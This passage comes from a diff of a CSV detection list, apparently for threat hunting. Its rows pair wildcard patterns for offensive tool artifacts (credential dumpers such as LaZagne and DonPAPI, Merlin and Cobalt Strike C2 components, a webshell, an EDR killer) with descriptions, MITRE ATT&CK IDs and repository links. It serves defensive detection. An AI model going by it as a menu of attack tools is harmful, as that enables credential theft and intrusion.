to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*memorydump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*memreader *access_token*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" "*MemReader_BoF.*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" 
-"*merlin-*.zip*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*merlin-*.zip*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*Merlin_v0.1Beta.zip*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*merlinAgent-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*merlinAgent-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - 
T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" "*merlinAgent.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*merlinAgent-Darwin-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*merlinAgent-Linux-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-Darwin-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-Linux-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" "*merlinAgent-Windows-x64.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" 
"*MerlinCheatSheet.pdf*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*merlinServer-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*merlinServer-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinServer-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinServer-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in 
golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" "*merlinserver.go*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinserver_windows_x64.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*merlinServer-Linux*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinServer-Linux*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" "*merlinServerLog.txt*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*mertdas/RedPersist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*mertdas/RedPersist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*mertdas/SharpLDAP*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*mertdas/SharpTerminator*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" -"*MessageBox.Show*Pwned*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety 
of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*MessageBox.Show*Pwned*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*messagebox_reflective.dll*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" -"*met_inject.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*met_inject.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*metagoofil*","offensive_tool_keyword","metagoofil","Metagoofil is a tool for extracting metadata of public documents (pdf.doc.xls.ppt..etc) availables in the target websites.This information could be useful because you can get valid usernames. people names. for using later in bruteforce password attacks (vpn. ftp. webapps). the tool will also extracts interesting paths of the documents. 
where we can get shared resources names. server names... etc.","T1213 - T1596 - T1083 - T1082","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/metagoofi","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*metame -i *.exe*","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" -"*Metasploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Metasploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*metasploit.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*metasploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*metasploit/framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*metasploit/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*metasploit_framework.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*metasploit-framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*metasploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit/framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*metasploit_framework.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit-framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*metasploit-framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*metasploitframework*.msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 